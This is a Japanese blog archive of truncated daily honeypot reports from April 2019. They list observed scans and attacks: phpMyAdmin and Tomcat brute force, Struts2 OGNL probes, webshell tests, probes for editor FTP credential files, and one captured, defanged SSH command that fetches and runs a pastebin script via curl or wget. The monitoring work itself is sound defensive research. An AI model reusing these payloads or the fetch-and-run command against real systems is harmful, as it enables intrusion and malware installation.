2019-04-01から1ヶ月間の記事一覧
本日の総アクセス件数は138件です。送信元IP数は7IPです。少ないですね。 件数 種別 リクエスト 66 phpMyAdminに関する攻撃 POST /phpmyadmin/ 63 アクセス GET / 2 Cisco製ルータの脆弱性(CVE-2019-1653)に関する攻撃 GET /cgi-bin/config.exp 2 環境設定の…
本日の総アクセス件数は165件です。送信元IP数は68IPです。・気になる通信 GET /muieblackcat phpmyadminに対してのスキャナのようです。 件数 種別 リクエスト 67 phpMyAdminに関する攻撃 POST /phpmyadmin/ 63 アクセス GET / 5 不正中継の調査 GET www.ba…
本日の総アクセス件数は205件です。送信元IP数は71IPです。気になる通信は特にありませんでした。 件数 種別 リクエスト 67 phpMyAdminに関する攻撃 POST /phpmyadmin/ 65 アクセス GET / 46 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html 4 …
本日の総アクセス件数は139件です。送信元IP数は56IPです。気になる通信は特にありませんでした。 件数 種別 リクエスト 69 phpMyAdminに関する攻撃 POST /phpmyadmin/ 55 アクセス GET / 3 不正中継の調査 GET 5.188.210[.]101/echo.php 2 FreePBXに関する…
本日の総アクセス件数は289件です。送信元IP数は79IPです。気になる通信は特にありませんでした。 件数 種別 リクエスト 72 phpMyAdminに関する攻撃 POST /phpmyadmin/ 68 アクセス GET / 3 不正中継の調査 POST 188.166.41[.]194/tmUnblock.cgi 2 Tomcat管…
本日の総アクセス件数は283件です。送信元IP数は74IPです。 Apache Struts2 の脆弱性(CVE-2017-5638)に関する通信を観測 拡張子が以下のような通信先に対し、 Apache Struts2 の脆弱性(CVE-2017-5638)に関する通信を観測しています。 ・.do ・.htm ・.html …
本日の総アクセス件数は166件です。送信元IP数は85IPです。新規の通信は観測できませんでした。 件数 種別 リクエスト 72 phpMyAdminに関する攻撃 POST /phpmyadmin/ 63 アクセス GET / 3 Amazon EC2 インスタンスメタデータの調査 GET 169.254.169[.]254/la…
本日の総アクセス件数は494件です。送信元IP数は81IPです。以下のpathに同一IPから来ていたので、すべてVOIP関連と判断しています。 /aastra/ /configs/ /gs/ /lib/ /polycom/ /provision/ /provisioning/ /spa/ /spa2102/ /tftp/ /voip_provisioning/ /xmls…
本日の総アクセス件数は149件です。送信元IP数は69IPです。・Apache Strutsの脆弱性調査と思われる通信を観測 どうやら以下の三つの脆弱性に関する調査のようです ・CVE-2013-2251 ・CVE-2017-5638 ・CVE-2018-11776 リクエスト Post / redirect:${#zzz=#con…
本日の総アクセス件数は742件です。送信元IP数81IPです。 ・ドイツのAVM GmbH社製のゲートウェイ機器FRITZ!Boxシリーズに関する通信・Nexus Repository Manager(CVE-2019-7238)に関する通信 遠隔からのコード実行が可能な脆弱性があるようです。 POSTの中身…
本日の総アクセス件数は474件です。送信元IP数は68IPです。 ・DFindによるスキャンと思われる通信を観測 DFindというスキャンツールだと思われますが、 ツールの詳細は分かりませんでした。 件数 種別 リクエスト 176 Tomcat管理ページへのブルートフォース…
本日の総アクセス件数は343件です。送信元IP数は64IPです。 ・詳細不明な通信 GET /Main という通信がありましたが、詳細わからず。 同じ送信元からも通信はありませんでした。 88 アクセス GET / 73 phpMyAdminに関する攻撃 POST /phpmyadmin/ 3 アクセス H…
本日の総アクセス件数は176件です。送信元IP数は77IPです。・ネットワークカメラに関する通信を観測しました。 GET /PSIA/index という通信がありました。 実際にIPカメラに行うと、PSIAルートサービスリストの XMLファイルが返ってくるようです。・詳細不明…
本日の総アクセス件数は1570件です。送信元IP数は71IPです。 ・phpのWebShell設置の通信を観測 久しぶりにWebShellに関する通信が多数来ました。 四月は "die(@md5(J4nur4ry))" の模様です。・PHPUnitの脆弱性(CVE-2017-9841)に関する通信を観測 通信自体はP…
本日の総アクセス件数は569件です。送信元IP数は75IPです。・Cisco製ルータRV320、RV325の脆弱性(CVE-2019-1652,CVE-2019-1653)に 関する通信を観測しました。・ThinkPHPに関連する通信を観測 GET hydra.phpという通信を検知しました。 以前にあった、ThinkP…
本日の総アクセス件数は614件です。送信元IP数は81IPです。 ・Spring Data Commonsの脆弱性(CVE-2018-1273)に関する攻撃を観測しました。 同様の通信は2019 4/1にも観測していますが、詳細が分かったため、記載します。・ヘッダ POST /users?page=&size=5 ・…
本日の総アクセス件数は599件です。送信元IP数は68IPです。・IPTV Stalkerに関する通信を観測しました。 ・ThinkPHPに関する攻撃を観測しました。 リクエストのpathがURLエンコードされているものを初めて観測しました。 また、該当のファイルはダウンロード…
本日の総アクセス件数は644件です。送信元IP数は90IPです。昨日来ていたNetgear ルータ DGN1000 に関する攻撃において、 wgetを行う宛先が変わっておりました。 本日の宛先からは、legion.mipsのダウンロードが可能でした。 VirusTotalによるとGafgytのよう…
4月3日にCowrieに来ていた攻撃を追ってみました。 一番最初にこの攻撃が観測されたのは4月2日4:48(JST)となります。sshでログインし、以下のコマンドを入力していました。 (curl -fsSL hxxps://pastebin[.]com/raw/v5XC0BJh||wget -q -O- hxxps://pastebin[]…
本日の総アクセス件数は594件です。送信元IP数は77IPです。"GET /" のような単なるアクセスと思われる通信が55IPから来ました。 内訳の多くは、日本リージョンに属するAWS上の4IPから、 計280回、UAがGo-http-clientの通信でした。 何かのテストでもしていた…
本日の総アクセス件数は826件です。送信元IP数は76IPです。phpMyAdminに対してGETでブルートフォース攻撃が来ていました。HIKVISION製の監視カメラに関する調査が来ていました。 以下のファイルにアクセスを試み、監視カメラの設定ファイルを確認しようとし…
本日の総アクセス件数は199件です。送信元IP数は42IPです。昼頃にHoneyPotを動かしているサーバが落ちてしまったため、ログ量が少なくなっています。 本日、特に珍しい通信は確認できませんでした。 件数 種別 リクエスト 162 phpMyAdminに関する攻撃 POST /…
本日の総アクセス件数は742件です。送信元IP数は88IPです。エディタの設定ファイルからFTPサーバの情報を得ようとする通信を確認しました。 VSCode /.vscode/sftp.json /.vscode/ftp-sync.json Atom /.ftpconfig /.remote-sync.json /deployment-config.json…
本日の総アクセス件数は705件です。送信元IP数は104IPです。久しぶりにWebShellの調査と思われる通信を確認しました。 h=die('Hello, Peppa!'); Peppaって何でしょうかね?PeppaPigというアニメがアメリカであるそうなので、それでしょうか? 送信元も西海岸…
全体的に通信がすくない一日でした。 日曜日はお休みなのでしょうか?Shellshockに関する攻撃のユーザー名として"rbn kjb"があったのですが、 何かによく使われるのでしょうか? 件数 種別 リクエスト 308 phpMyAdminに関する攻撃 POST /phpmyadmin/ 58 アク…
FreePBXやCisco IOS Telephony Serviceなど、おそらくVoIP関連の通信が見られました。 また、昨日に続きWordPress関連の通信が多い一日となっています。 件数 種別 リクエスト 457 WordPress、XML-RPCに関する攻撃 POST /xmlrpc.php 456 WordPressに関する調…
WordPressに関する通信が多い一日でした。WordPressに関する通信が日本時間で 2019/03/29 06:00-07:00頃に一旦止まっていました。 HoneyPot自体は稼働していたので、攻撃側に何かあったのでしょうか? 707 WordPressに関する調査 GET /wp-login.php 707 Word…
中国にある1つのIPからドメインあてに多数の通信が来ました。 以下の表にある通信件数が1件の通信は、ほぼすべて同一の送信元からの通信でした。 通信のほとんどが意図がわからず、不明としてあります。後日時間があれば調査しようと思います。 件数 種別 …
脆弱性を狙った通信が多い?一日でした。組込みシステムによく用いられるOS、ZeroShellに対する攻撃が記録されました。 typeパラメータを通して任意のコマンドを実行できるようです。 /var/tmp/voip.cfgを見ていることからIP電話などに対する攻撃でしょうか…